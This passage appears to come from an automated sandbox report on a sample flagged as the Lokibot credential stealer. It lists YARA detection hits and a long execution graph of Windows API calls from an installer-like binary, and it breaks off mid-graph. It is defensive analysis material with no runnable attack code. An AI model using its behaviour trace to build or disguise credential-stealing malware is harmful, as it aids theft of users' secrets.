                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:15.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:23.4%
                          Total number of Nodes:1238
                          Total number of Limit Nodes:24
                          execution_graph 3497 401cc1 GetDlgItem GetClientRect 3498 4029e8 18 API calls 3497->3498 3499 401cf1 LoadImageA SendMessageA 3498->3499 3500 40287d 3499->3500 3501 401d0f DeleteObject 3499->3501 3501->3500 3502 401dc1 3503 4029e8 18 API calls 3502->3503 3504 401dc7 3503->3504 3505 4029e8 18 API calls 3504->3505 3506 401dd0 3505->3506 3507 4029e8 18 API calls 3506->3507 3508 401dd9 3507->3508 3509 4029e8 18 API calls 3508->3509 3510 401de2 3509->3510 3511 401423 25 API calls 3510->3511 3512 401de9 ShellExecuteA 3511->3512 3513 401e16 3512->3513 3514 401ec5 3515 4029e8 18 API calls 3514->3515 3516 401ecc GetFileVersionInfoSizeA 3515->3516 3517 401eef GlobalAlloc 3516->3517 3520 401f45 3516->3520 3518 401f03 GetFileVersionInfoA 3517->3518 3517->3520 3519 401f14 VerQueryValueA 3518->3519 3518->3520 3519->3520 3521 401f2d 3519->3521 3525 4059e3 wsprintfA 3521->3525 3523 401f39 3526 4059e3 wsprintfA 3523->3526 3525->3523 3526->3520 3527 4014ca 3528 404e23 25 API calls 3527->3528 3529 4014d1 3528->3529 3530 403f4b lstrcpynA lstrlenA 3531 40604c 3537 405ed0 3531->3537 3532 40683b 3533 405f51 GlobalFree 3534 405f5a GlobalAlloc 3533->3534 3534->3532 3534->3537 3535 405fd1 GlobalAlloc 3535->3532 3535->3537 3536 405fc8 GlobalFree 3536->3535 3537->3532 3537->3533 3537->3534 3537->3535 3537->3536 3538 401f51 3539 401f63 3538->3539 3549 402004 3538->3549 3540 4029e8 18 API calls 3539->3540 3541 401f6a 3540->3541 3543 4029e8 18 API calls 3541->3543 3542 401423 25 API calls 3547 40215b 3542->3547 3544 401f73 3543->3544 3545 401f88 LoadLibraryExA 3544->3545 3546 401f7b GetModuleHandleA 3544->3546 3548 401f98 GetProcAddress 3545->3548 3545->3549 3546->3545 3546->3548 3550 401fe5 3548->3550 3551 401fa8 3548->3551 3549->3542 3552 404e23 25 API calls 3550->3552 3553 401423 25 API calls 3551->3553 3554 401fb8 3551->3554 3552->3554 3553->3554 3554->3547 3555 401ff8 FreeLibrary 3554->3555 3555->3547 3563 4014d6 3568 4029cb 3563->3568 3565 4014dc Sleep 3567 40287d 3565->3567 3569 405aa7 18 API calls 3568->3569 3570 4029df 3569->3570 3570->3565 3576 402858 SendMessageA 3577 402872 InvalidateRect 3576->3577 3578 40287d 3576->3578 3577->3578 3579 4018d8 3580 40190f 3579->3580 3581 4029e8 18 API calls 3580->3581 3582 401914 3581->3582 3583 4053aa 68 API calls 3582->3583 3584 40191d 3583->3584 3585 402259 3586 4029e8 18 API calls 3585->3586 3587 402267 3586->3587 3588 4029e8 18 API calls 3587->3588 3589 402270 3588->3589 3590 4029e8 18 API calls 3589->3590 3591 40227a GetPrivateProfileStringA 3590->3591 3592 40155b 3593 401577 ShowWindow 3592->3593 3594 40157e 3592->3594 3593->3594 3595 40158c ShowWindow 3594->3595 3596 40287d 3594->3596 3595->3596 3597 4018db 3598 4029e8 18 API calls 3597->3598 3599 4018e2 3598->3599 3600 405346 MessageBoxIndirectA 3599->3600 3601 4018eb 3600->3601 3602 404f61 3603 404f82 GetDlgItem GetDlgItem GetDlgItem 3602->3603 3604 40510d 3602->3604 3648 403e6c SendMessageA 3603->3648 3606 405116 GetDlgItem CreateThread CloseHandle 3604->3606 3607 40513e 3604->3607 3606->3607 3609 405169 3607->3609 3610 405155 ShowWindow ShowWindow 3607->3610 3611 40518b 3607->3611 3608 404ff3 3613 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 3608->3613 3612 4051c7 3609->3612 3615 4051a0 ShowWindow 3609->3615 3616 40517a 3609->3616 3650 403e6c SendMessageA 3610->3650 3617 403e9e 8 API calls 3611->3617 3612->3611 3622 4051d2 SendMessageA 3612->3622 3620 405069 3613->3620 3621 40504d SendMessageA SendMessageA 3613->3621 3618 4051c0 3615->3618 3619 4051b2 3615->3619 3623 403e10 SendMessageA 3616->3623 3624 405199 3617->3624 3626 403e10 SendMessageA 3618->3626 3625 404e23 25 API calls 3619->3625 3627 40507c 3620->3627 3628 40506e SendMessageA 3620->3628 3621->3620 3622->3624 3629 4051eb CreatePopupMenu 3622->3629 3623->3611 3625->3618 3626->3612 3631 403e37 19 API calls 3627->3631 3628->3627 3630 405aa7 18 API calls 3629->3630 3632 4051fb AppendMenuA 3630->3632 3633 40508c 3631->3633 3634 405221 3632->3634 3635 40520e GetWindowRect 3632->3635 3636 405095 ShowWindow 3633->3636 3637 4050c9 GetDlgItem SendMessageA 3633->3637 3639 40522a TrackPopupMenu 3634->3639 3635->3639 3640 4050b8 3636->3640 3641 4050ab ShowWindow 3636->3641 3637->3624 3638 4050f0 SendMessageA SendMessageA 3637->3638 3638->3624 3639->3624 3642 405248 3639->3642 3649 403e6c SendMessageA 3640->3649 3641->3640 3643 405264 SendMessageA 3642->3643 3643->3643 3645 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3643->3645 3646 4052a3 SendMessageA 3645->3646 3646->3646 3647 4052c4 GlobalUnlock SetClipboardData CloseClipboard 3646->3647 3647->3624 3648->3608 3649->3637 3650->3609 2950 403964 2951 403ab7 2950->2951 2952 40397c 2950->2952 2954 403b08 2951->2954 2955 403ac8 GetDlgItem GetDlgItem 2951->2955 2952->2951 2953 403988 2952->2953 2956 403993 SetWindowPos 2953->2956 2957 4039a6 2953->2957 2959 403b62 2954->2959 3049 401389 2954->3049 3046 403e37 2955->3046 2956->2957 2961 4039c3 2957->2961 2962 4039ab ShowWindow 2957->2962 2982 403ab2 2959->2982 3023 403e83 2959->3023 2964 4039e5 2961->2964 2965 4039cb DestroyWindow 2961->2965 2962->2961 2963 403af2 SetClassLongA 2966 40140b 2 API calls 2963->2966 2970 4039ea SetWindowLongA 2964->2970 2971 4039fb 2964->2971 2973 403de1 2965->2973 2966->2954 2969 403b74 2974 40140b 2 API calls 2969->2974 2975 403dc2 DestroyWindow EndDialog 2969->2975 2983 405aa7 18 API calls 2969->2983 2993 403e37 19 API calls 2969->2993 2996 403e37 19 API calls 2969->2996 2970->2982 2976 403aa4 2971->2976 2977 403a07 GetDlgItem 2971->2977 2972 403b3e SendMessageA 2972->2982 2979 403df1 ShowWindow 2973->2979 2973->2982 2974->2969 2975->2973 3032 403e9e 2976->3032 2980 403a37 2977->2980 2981 403a1a SendMessageA IsWindowEnabled 2977->2981 2979->2982 2984 403a44 2980->2984 2985 403a8b SendMessageA 2980->2985 2986 403a57 2980->2986 2995 403a3c 2980->2995 2981->2980 2981->2982 2983->2969 2984->2985 2984->2995 2985->2976 2988 403a74 2986->2988 2989 403a5f 2986->2989 2992 40140b 2 API calls 2988->2992 3026 40140b 2989->3026 2990 403a72 2990->2976 2994 403a7b 2992->2994 2993->2969 2994->2976 2994->2995 3029 403e10 2995->3029 2997 403bef GetDlgItem 2996->2997 2998 403c04 2997->2998 2999 403c0c ShowWindow EnableWindow 2997->2999 2998->2999 3053 403e59 EnableWindow 2999->3053 3001 403c36 EnableWindow 3004 403c4a 3001->3004 3002 403c4f GetSystemMenu EnableMenuItem SendMessageA 3003 403c7f SendMessageA 3002->3003 3002->3004 3003->3004 3004->3002 3054 403e6c SendMessageA 3004->3054 3055 405a85 lstrcpynA 3004->3055 3007 403cad lstrlenA 3008 405aa7 18 API calls 3007->3008 3009 403cbe SetWindowTextA 3008->3009 3010 401389 2 API calls 3009->3010 3012 403ccf 3010->3012 3011 403d02 DestroyWindow 3011->2973 3013 403d1c CreateDialogParamA 3011->3013 3012->2969 3012->2982 3012->3011 3014 403cfd 3012->3014 3013->2973 3015 403d4f 3013->3015 3014->2982 3016 403e37 19 API calls 3015->3016 3017 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3016->3017 3018 401389 2 API calls 3017->3018 3019 403da0 3018->3019 3019->2982 3020 403da8 ShowWindow 3019->3020 3021 403e83 SendMessageA 3020->3021 3022 403dc0 3021->3022 3022->2973 3024 403e9b 3023->3024 3025 403e8c SendMessageA 3023->3025 3024->2969 3025->3024 3027 401389 2 API calls 3026->3027 3028 401420 3027->3028 3028->2995 3030 403e17 3029->3030 3031 403e1d SendMessageA 3029->3031 3030->3031 3031->2990 3033 403eb6 GetWindowLongA 3032->3033 3043 403f3f 3032->3043 3034 403ec7 3033->3034 3033->3043 3035 403ed6 GetSysColor 3034->3035 3036 403ed9 3034->3036 3035->3036 3037 403ee9 SetBkMode 3036->3037 3038 403edf SetTextColor 3036->3038 3039 403f01 GetSysColor 3037->3039 3040 403f07 3037->3040 3038->3037 3039->3040 3041 403f18 3040->3041 3042 403f0e SetBkColor 3040->3042 3041->3043 3044 403f32 CreateBrushIndirect 3041->3044 3045 403f2b DeleteObject 3041->3045 3042->3041 3043->2982 3044->3043 3045->3044 3047 405aa7 18 API calls 3046->3047 3048 403e42 SetDlgItemTextA 3047->3048 3048->2963 3051 401390 3049->3051 3050 4013fe 3050->2959 3050->2972 3051->3050 3052 4013cb MulDiv SendMessageA 3051->3052 3052->3051 3053->3001 3054->3004 3055->3007 3651 402164 3652 4029e8 18 API calls 3651->3652 3653 40216a 3652->3653 3654 4029e8 18 API calls 3653->3654 3655 402173 3654->3655 3656 4029e8 18 API calls 3655->3656 3657 40217c 3656->3657 3658 405d7c 2 API calls 3657->3658 3659 402185 3658->3659 3660 402196 lstrlenA lstrlenA 3659->3660 3661 402189 3659->3661 3663 404e23 25 API calls 3660->3663 3662 404e23 25 API calls 3661->3662 3665 402191 3662->3665 3664 4021d2 SHFileOperationA 3663->3664 3664->3661 3664->3665 3666 4019e6 3667 4029e8 18 API calls 3666->3667 3668 4019ef ExpandEnvironmentStringsA 3667->3668 3669 401a03 3668->3669 3671 401a16 3668->3671 3670 401a08 lstrcmpA 3669->3670 3669->3671 3670->3671 3672 4021e6 3673 402200 3672->3673 3674 4021ed 3672->3674 3675 405aa7 18 API calls 3674->3675 3676 4021fa 3675->3676 3677 405346 MessageBoxIndirectA 3676->3677 3677->3673 3685 401c6d 3686 4029cb 18 API calls 3685->3686 3687 401c73 IsWindow 3686->3687 3688 4019d6 3687->3688 3689 4025ed 3690 4025f4 3689->3690 3691 40287d 3689->3691 3692 4025fa FindClose 3690->3692 3692->3691 3693 40266e 3694 4029e8 18 API calls 3693->3694 3696 40267c 3694->3696 3695 402692 3698 40573d 2 API calls 3695->3698 3696->3695 3697 4029e8 18 API calls 3696->3697 3697->3695 3699 402698 3698->3699 3719 40575c GetFileAttributesA CreateFileA 3699->3719 3701 4026a5 3702 4026b1 GlobalAlloc 3701->3702 3703 40274e 3701->3703 3704 402745 CloseHandle 3702->3704 3705 4026ca 3702->3705 3706 402756 DeleteFileA 3703->3706 3707 402769 3703->3707 3704->3703 3720 4031da SetFilePointer 3705->3720 3706->3707 3709 4026d0 3710 4031a8 ReadFile 3709->3710 3711 4026d9 GlobalAlloc 3710->3711 3712 4026e9 3711->3712 3713 40271d WriteFile GlobalFree 3711->3713 3715 402f01 47 API calls 3712->3715 3714 402f01 47 API calls 3713->3714 3716 402742 3714->3716 3718 4026f6 3715->3718 3716->3704 3717 402714 GlobalFree 3717->3713 3718->3717 3719->3701 3720->3709 3721 40276f 3722 4029cb 18 API calls 3721->3722 3723 402775 3722->3723 3724 4027b0 3723->3724 3725 402799 3723->3725 3730 40264e 3723->3730 3728 4027c6 3724->3728 3729 4027ba 3724->3729 3726 4027ad 3725->3726 3727 40279e 3725->3727 3736 4059e3 wsprintfA 3726->3736 3735 405a85 lstrcpynA 3727->3735 3732 405aa7 18 API calls 3728->3732 3731 4029cb 18 API calls 3729->3731 3731->3730 3732->3730 3735->3730 3736->3730 3737 4014f0 SetForegroundWindow 3738 40287d 3737->3738 3739 404772 GetDlgItem GetDlgItem 3740 4047c6 7 API calls 3739->3740 3749 4049e3 3739->3749 3741 40486c DeleteObject 3740->3741 3742 40485f SendMessageA 3740->3742 3743 404877 3741->3743 3742->3741 3744 4048ae 3743->3744 3748 405aa7 18 API calls 3743->3748 3746 403e37 19 API calls 3744->3746 3745 404acd 3747 404b7c 3745->3747 3758 404b26 SendMessageA 3745->3758 3780 4049d6 3745->3780 3750 4048c2 3746->3750 3752 404b91 3747->3752 3753 404b85 SendMessageA 3747->3753 3754 404890 SendMessageA SendMessageA 3748->3754 3749->3745 3751 404a57 3749->3751 3792 4046f2 SendMessageA 3749->3792 3757 403e37 19 API calls 3750->3757 3751->3745 3760 404abf SendMessageA 3751->3760 3755 404bba 3752->3755 3761 404ba3 ImageList_Destroy 3752->3761 3762 404baa 3752->3762 3753->3752 3754->3743 3764 404d20 3755->3764 3777 40140b 2 API calls 3755->3777 3786 404bec 3755->3786 3763 4048d0 3757->3763 3765 404b3b SendMessageA 3758->3765 3758->3780 3759 403e9e 8 API calls 3766 404d6c 3759->3766 3760->3745 3761->3762 3762->3755 3767 404bb3 GlobalFree 3762->3767 3768 4049a4 GetWindowLongA SetWindowLongA 3763->3768 3776 40491f SendMessageA 3763->3776 3779 40499e 3763->3779 3781 40495b SendMessageA 3763->3781 3782 40496c SendMessageA 3763->3782 3770 404d32 ShowWindow GetDlgItem ShowWindow 3764->3770 3764->3780 3773 404b4e 3765->3773 3767->3755 3769 4049bd 3768->3769 3771 4049c3 ShowWindow 3769->3771 3772 4049db 3769->3772 3770->3780 3790 403e6c SendMessageA 3771->3790 3791 403e6c SendMessageA 3772->3791 3778 404b5f SendMessageA 3773->3778 3776->3763 3777->3786 3778->3747 3779->3768 3779->3769 3780->3759 3781->3763 3782->3763 3783 404cf6 InvalidateRect 3783->3764 3784 404d0c 3783->3784 3797 404610 3784->3797 3785 404c1a SendMessageA 3788 404c30 3785->3788 3786->3785 3786->3788 3788->3783 3789 404ca4 SendMessageA SendMessageA 3788->3789 3789->3788 3790->3780 3791->3749 3793 404751 SendMessageA 3792->3793 3794 404715 GetMessagePos ScreenToClient SendMessageA 3792->3794 3795 404749 3793->3795 3794->3795 3796 40474e 3794->3796 3795->3751 3796->3793 3798 40462a 3797->3798 3799 405aa7 18 API calls 3798->3799 3800 40465f 3799->3800 3801 405aa7 18 API calls 3800->3801 3802 40466a 3801->3802 3803 405aa7 18 API calls 3802->3803 3804 40469b lstrlenA wsprintfA SetDlgItemTextA 3803->3804 3804->3764 3805 404d73 3806 404d81 3805->3806 3807 404d98 3805->3807 3808 404d87 3806->3808 3823 404e01 3806->3823 3809 404da6 IsWindowVisible 3807->3809 3815 404dbd 3807->3815 3810 403e83 SendMessageA 3808->3810 3812 404db3 3809->3812 3809->3823 3813 404d91 3810->3813 3811 404e07 CallWindowProcA 3811->3813 3814 4046f2 5 API calls 3812->3814 3814->3815 3815->3811 3824 405a85 lstrcpynA 3815->3824 3817 404dec 3825 4059e3 wsprintfA 3817->3825 3819 404df3 3820 40140b 2 API calls 3819->3820 3821 404dfa 3820->3821 3826 405a85 lstrcpynA 3821->3826 3823->3811 3824->3817 3825->3819 3826->3823 3827 404275 3828 4042b3 3827->3828 3829 4042a6 3827->3829 3831 4042bc GetDlgItem 3828->3831 3833 40431f 3828->3833 3888 40532a GetDlgItemTextA 3829->3888 3835 4042d0 3831->3835 3832 404403 3886 40458f 3832->3886 3890 40532a GetDlgItemTextA 3832->3890 3833->3832 3841 405aa7 18 API calls 3833->3841 3833->3886 3834 4042ad 3836 405ce3 5 API calls 3834->3836 3837 4042e4 SetWindowTextA 3835->3837 3839 40560c 4 API calls 3835->3839 3836->3828 3840 403e37 19 API calls 3837->3840 3845 4042da 3839->3845 3846 404302 3840->3846 3847 404395 SHBrowseForFolderA 3841->3847 3842 40442f 3848 405659 18 API calls 3842->3848 3843 403e9e 8 API calls 3844 4045a3 3843->3844 3845->3837 3852 405578 3 API calls 3845->3852 3849 403e37 19 API calls 3846->3849 3847->3832 3850 4043ad CoTaskMemFree 3847->3850 3851 404435 3848->3851 3853 404310 3849->3853 3854 405578 3 API calls 3850->3854 3891 405a85 lstrcpynA 3851->3891 3852->3837 3889 403e6c SendMessageA 3853->3889 3856 4043ba 3854->3856 3859 4043f1 SetDlgItemTextA 3856->3859 3863 405aa7 18 API calls 3856->3863 3858 404318 3861 405da3 3 API calls 3858->3861 3859->3832 3860 40444c 3862 405da3 3 API calls 3860->3862 3861->3833 3869 404454 3862->3869 3864 4043d9 lstrcmpiA 3863->3864 3864->3859 3867 4043ea lstrcatA 3864->3867 3865 40448e 3892 405a85 lstrcpynA 3865->3892 3867->3859 3868 404497 3870 40560c 4 API calls 3868->3870 3869->3865 3874 4055bf 2 API calls 3869->3874 3875 4044e1 3869->3875 3871 40449d GetDiskFreeSpaceA 3870->3871 3873 4044bf MulDiv 3871->3873 3871->3875 3873->3875 3874->3869 3876 40453e 3875->3876 3878 404610 21 API calls 3875->3878 3877 404561 3876->3877 3879 40140b 2 API calls 3876->3879 3893 403e59 EnableWindow 3877->3893 3880 404530 3878->3880 3879->3877 3882 404540 SetDlgItemTextA 3880->3882 3883 404535 3880->3883 3882->3876 3885 404610 21 API calls 3883->3885 3884 40457d 3884->3886 3894 40420a 3884->3894 3885->3876 3886->3843 3888->3834 3889->3858 3890->3842 3891->3860 3892->3868 3893->3884 3895 404218 3894->3895 3896 40421d SendMessageA 3894->3896 3895->3896 3896->3886 3897 4022f5 3898 4022fb 3897->3898 3899 4029e8 18 API calls 3898->3899 3900 40230d 3899->3900 3901 4029e8 18 API calls 3900->3901 3902 402317 RegCreateKeyExA 3901->3902 3903 402341 3902->3903 3904 40264e 3902->3904 3905 402359 3903->3905 3906 4029e8 18 API calls 3903->3906 3907 402365 3905->3907 3910 4029cb 18 API calls 3905->3910 3909 402352 lstrlenA 3906->3909 3908 402380 RegSetValueExA 3907->3908 3911 402f01 47 API calls 3907->3911 3912 402396 RegCloseKey 3908->3912 3909->3905 3910->3907 3911->3908 3912->3904 3914 4027f5 3915 4029cb 18 API calls 3914->3915 3916 4027fb 3915->3916 3917 40282c 3916->3917 3918 402809 3916->3918 3920 40264e 3916->3920 3919 405aa7 18 API calls 3917->3919 3917->3920 3918->3920 3922 4059e3 wsprintfA 3918->3922 3919->3920 3922->3920 3923 4024f8 3924 4029cb 18 API calls 3923->3924 3925 402502 3924->3925 3926 402536 ReadFile 3925->3926 3927 40257a 3925->3927 3928 40258a 3925->3928 3931 402578 3925->3931 3926->3925 3926->3931 3932 4059e3 wsprintfA 3927->3932 3930 4025a0 SetFilePointer 3928->3930 3928->3931 3930->3931 3932->3931 3933 4016fa 3934 4029e8 18 API calls 3933->3934 3935 401701 SearchPathA 3934->3935 3936 40171c 3935->3936 3937 4014fe 3938 401506 3937->3938 3940 401519 3937->3940 3939 4029cb 18 API calls 3938->3939 3939->3940 3941 403f7f 3942 4040a2 3941->3942 3943 403f95 3941->3943 3944 404111 3942->3944 3950 4041e5 3942->3950 3953 4040e6 GetDlgItem SendMessageA 3942->3953 3945 403e37 19 API calls 3943->3945 3946 40411b GetDlgItem 3944->3946 3944->3950 3947 403feb 3945->3947 3948 404131 3946->3948 3949 4041a3 3946->3949 3951 403e37 19 API calls 3947->3951 3948->3949 3956 404157 6 API calls 3948->3956 3949->3950 3957 4041b5 3949->3957 3952 403e9e 8 API calls 3950->3952 3954 403ff8 CheckDlgButton 3951->3954 3955 4041e0 3952->3955 3972 403e59 EnableWindow 3953->3972 3970 403e59 EnableWindow 3954->3970 3956->3949 3961 4041bb SendMessageA 3957->3961 3962 4041cc 3957->3962 3959 40410c 3963 40420a SendMessageA 3959->3963 3961->3962 3962->3955 3965 4041d2 SendMessageA 3962->3965 3963->3944 3964 404016 GetDlgItem 3971 403e6c SendMessageA 3964->3971 3965->3955 3967 40402c SendMessageA 3968 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3967->3968 3969 40404a GetSysColor 3967->3969 3968->3955 3969->3968 3970->3964 3971->3967 3972->3959 3973 401000 3974 401037 BeginPaint GetClientRect 3973->3974 3975 40100c DefWindowProcA 3973->3975 3977 4010f3 3974->3977 3978 401179 3975->3978 3979 401073 CreateBrushIndirect FillRect DeleteObject 3977->3979 3980 4010fc 3977->3980 3979->3977 3981 401102 CreateFontIndirectA 3980->3981 3982 401167 EndPaint 3980->3982 3981->3982 3983 401112 6 API calls 3981->3983 3982->3978 3983->3982 3998 401b06 3999 401b13 3998->3999 4000 401b57 3998->4000 4001 4021ed 3999->4001 4007 401b2a 3999->4007 4002 401b80 GlobalAlloc 4000->4002 4003 401b5b 4000->4003 4004 405aa7 18 API calls 4001->4004 4005 405aa7 18 API calls 4002->4005 4011 401b9b 4003->4011 4019 405a85 lstrcpynA 4003->4019 4006 4021fa 4004->4006 4005->4011 4012 405346 MessageBoxIndirectA 4006->4012 4017 405a85 lstrcpynA 4007->4017 4010 401b6d GlobalFree 4010->4011 4012->4011 4013 401b39 4018 405a85 lstrcpynA 4013->4018 4015 401b48 4020 405a85 lstrcpynA 4015->4020 4017->4013 4018->4015 4019->4010 4020->4011 4021 402607 4022 40260a 4021->4022 4024 402622 4021->4024 4023 402617 FindNextFileA 4022->4023 4023->4024 4025 402661 4023->4025 4027 405a85 lstrcpynA 4025->4027 4027->4024 4035 401c8a 4036 4029cb 18 API calls 4035->4036 4037 401c91 4036->4037 4038 4029cb 18 API calls 4037->4038 4039 401c99 GetDlgItem 4038->4039 4040 4024aa 4039->4040 4041 40248e 4042 4029e8 18 API calls 4041->4042 4043 402495 4042->4043 4046 40575c GetFileAttributesA CreateFileA 4043->4046 4045 4024a1 4046->4045 4047 402012 4048 4029e8 18 API calls 4047->4048 4049 402019 4048->4049 4050 4029e8 18 API calls 4049->4050 4051 402023 4050->4051 4052 4029e8 18 API calls 4051->4052 4053 40202c 4052->4053 4054 4029e8 18 API calls 4053->4054 4055 402036 4054->4055 4056 4029e8 18 API calls 4055->4056 4058 402040 4056->4058 4057 402054 CoCreateInstance 4062 402073 4057->4062 4064 402129 4057->4064 4058->4057 4059 4029e8 18 API calls 4058->4059 4059->4057 4060 401423 25 API calls 4061 40215b 4060->4061 4063 402108 MultiByteToWideChar 4062->4063 4062->4064 4063->4064 4064->4060 4064->4061 4065 402215 4066 402223 4065->4066 4067 40221d 4065->4067 4069 4029e8 18 API calls 4066->4069 4071 402233 4066->4071 4068 4029e8 18 API calls 4067->4068 4068->4066 4069->4071 4070 402241 4072 4029e8 18 API calls 4070->4072 4071->4070 4073 4029e8 18 API calls 4071->4073 4074 40224a WritePrivateProfileStringA 4072->4074 4073->4070 4075 401595 4076 4029e8 18 API calls 4075->4076 4077 40159c SetFileAttributesA 4076->4077 4078 4015ae 4077->4078 4079 401d95 4080 4029cb 18 API calls 4079->4080 4081 401d9b 4080->4081 4082 4029cb 18 API calls 4081->4082 4083 401da4 4082->4083 4084 401db6 EnableWindow 4083->4084 4085 401dab ShowWindow 4083->4085 4086 40287d 4084->4086 4085->4086 4087 401e95 4088 4029e8 18 API calls 4087->4088 4089 401e9c 4088->4089 4090 405d7c 2 API calls 4089->4090 4091 401ea2 4090->4091 4093 401eb4 4091->4093 4094 4059e3 wsprintfA 4091->4094 4094->4093 4095 401696 4096 4029e8 18 API calls 4095->4096 4097 40169c GetFullPathNameA 4096->4097 4098 4016b3 4097->4098 4104 4016d4 4097->4104 4100 405d7c 2 API calls 4098->4100 4098->4104 4099 4016e8 GetShortPathNameA 4101 40287d 4099->4101 4102 4016c4 4100->4102 4102->4104 4105 405a85 lstrcpynA 4102->4105 4104->4099 4104->4101 4105->4104 4113 402419 4123 402af2 4113->4123 4115 402423 4116 4029cb 18 API calls 4115->4116 4117 40242c 4116->4117 4118 402443 RegEnumKeyA 4117->4118 4119 40244f RegEnumValueA 4117->4119 4120 40264e 4117->4120 4121 402468 RegCloseKey 4118->4121 4119->4120 4119->4121 4121->4120 4124 4029e8 18 API calls 4123->4124 4125 402b0b 4124->4125 4126 402b19 RegOpenKeyExA 4125->4126 4126->4115 4127 402299 4128 4022c9 4127->4128 4129 40229e 4127->4129 4131 4029e8 18 API calls 4128->4131 4130 402af2 19 API calls 4129->4130 4133 4022a5 4130->4133 4132 4022d0 4131->4132 4138 402a28 RegOpenKeyExA 4132->4138 4134 4029e8 18 API calls 4133->4134 4137 4022e6 4133->4137 4136 4022b6 RegDeleteValueA RegCloseKey 4134->4136 4136->4137 4142 402a53 4138->4142 4146 402a9f 4138->4146 4139 402a79 RegEnumKeyA 4140 402a8b RegCloseKey 4139->4140 4139->4142 4143 405da3 3 API calls 4140->4143 4141 402ab0 RegCloseKey 4141->4146 4142->4139 4142->4140 4142->4141 4144 402a28 3 API calls 4142->4144 4145 402a9b 4143->4145 4144->4142 4145->4146 4147 402acb RegDeleteKeyA 4145->4147 4146->4137 4147->4146 3474 401e1b 3475 4029e8 18 API calls 3474->3475 3476 401e21 3475->3476 3477 404e23 25 API calls 3476->3477 3478 401e2b 3477->3478 3479 4052e5 2 API calls 3478->3479 3480 401e31 3479->3480 3481 401e87 CloseHandle 3480->3481 3482 40264e 3480->3482 3483 401e50 WaitForSingleObject 3480->3483 3485 405ddc 2 API calls 3480->3485 3481->3482 3483->3480 3484 401e5e GetExitCodeProcess 3483->3484 3486 401e70 3484->3486 3487 401e7b 3484->3487 3485->3483 3490 4059e3 wsprintfA 3486->3490 3487->3481 3489 401e79 3487->3489 3489->3481 3490->3489 4148 401d1b GetDC GetDeviceCaps 4149 4029cb 18 API calls 4148->4149 4150 401d37 MulDiv 4149->4150 4151 4029cb 18 API calls 4150->4151 4152 401d4c 4151->4152 4153 405aa7 18 API calls 4152->4153 4154 401d85 CreateFontIndirectA 4153->4154 4155 4024aa 4154->4155 2855 401721 2861 4029e8 2855->2861 2859 40172f 2860 40578b 2 API calls 2859->2860 2860->2859 2862 4029f4 2861->2862 2871 405aa7 2862->2871 2865 401728 2867 40578b 2865->2867 2868 405796 GetTickCount GetTempFileNameA 2867->2868 2869 4057c2 2868->2869 2870 4057c6 2868->2870 2869->2868 2869->2870 2870->2859 2877 405ab4 2871->2877 2872 405cca 2873 402a15 2872->2873 2906 405a85 lstrcpynA 2872->2906 2873->2865 2890 405ce3 2873->2890 2875 405b48 GetVersion 2889 405b55 2875->2889 2876 405ca1 lstrlenA 2876->2877 2877->2872 2877->2875 2877->2876 2878 405aa7 10 API calls 2877->2878 2884 405ce3 5 API calls 2877->2884 2904 4059e3 wsprintfA 2877->2904 2905 405a85 lstrcpynA 2877->2905 2878->2876 2882 405bc0 GetSystemDirectoryA 2882->2889 2883 405bd3 GetWindowsDirectoryA 2883->2889 2884->2877 2885 405aa7 10 API calls 2885->2889 2886 405c4a lstrcatA 2886->2877 2887 405c07 SHGetSpecialFolderLocation 2888 405c1f SHGetPathFromIDListA CoTaskMemFree 2887->2888 2887->2889 2888->2889 2889->2877 2889->2882 2889->2883 2889->2885 2889->2886 2889->2887 2899 40596c RegOpenKeyExA 2889->2899 2896 405cef 2890->2896 2891 405d57 2892 405d5b CharPrevA 2891->2892 2894 405d76 2891->2894 2892->2891 2893 405d4c CharNextA 2893->2891 2893->2896 2894->2865 2896->2891 2896->2893 2897 405d3a CharNextA 2896->2897 2898 405d47 CharNextA 2896->2898 2907 4055a3 2896->2907 2897->2896 2898->2893 2900 4059dd 2899->2900 2901 40599f RegQueryValueExA 2899->2901 2900->2889 2902 4059c0 RegCloseKey 2901->2902 2902->2900 2904->2877 2905->2877 2906->2873 2908 4055a9 2907->2908 2909 4055bc 2908->2909 2910 4055af CharNextA 2908->2910 2909->2896 2910->2908 4156 4023a1 4157 402af2 19 API calls 4156->4157 4158 4023ab 4157->4158 4159 4029e8 18 API calls 4158->4159 4160 4023b4 4159->4160 4161 40264e 4160->4161 4162 4023be RegQueryValueExA 4160->4162 4163 4023de 4162->4163 4164 4023e4 RegCloseKey 4162->4164 4163->4164 4167 4059e3 wsprintfA 4163->4167 4164->4161 4167->4164 4168 401922 4169 4029e8 18 API calls 4168->4169 4170 401929 lstrlenA 4169->4170 4171 4024aa 4170->4171 3170 403225 #17 SetErrorMode OleInitialize 3240 405da3 GetModuleHandleA 3170->3240 3174 403293 GetCommandLineA 3245 405a85 lstrcpynA 3174->3245 3176 4032a5 GetModuleHandleA 3177 4032bc 3176->3177 3178 4055a3 CharNextA 3177->3178 3179 4032d0 CharNextA 3178->3179 3185 4032dd 3179->3185 3180 403346 3181 403359 GetTempPathA 3180->3181 3246 4031f1 3181->3246 3183 40336f 3186 403393 DeleteFileA 3183->3186 3187 403373 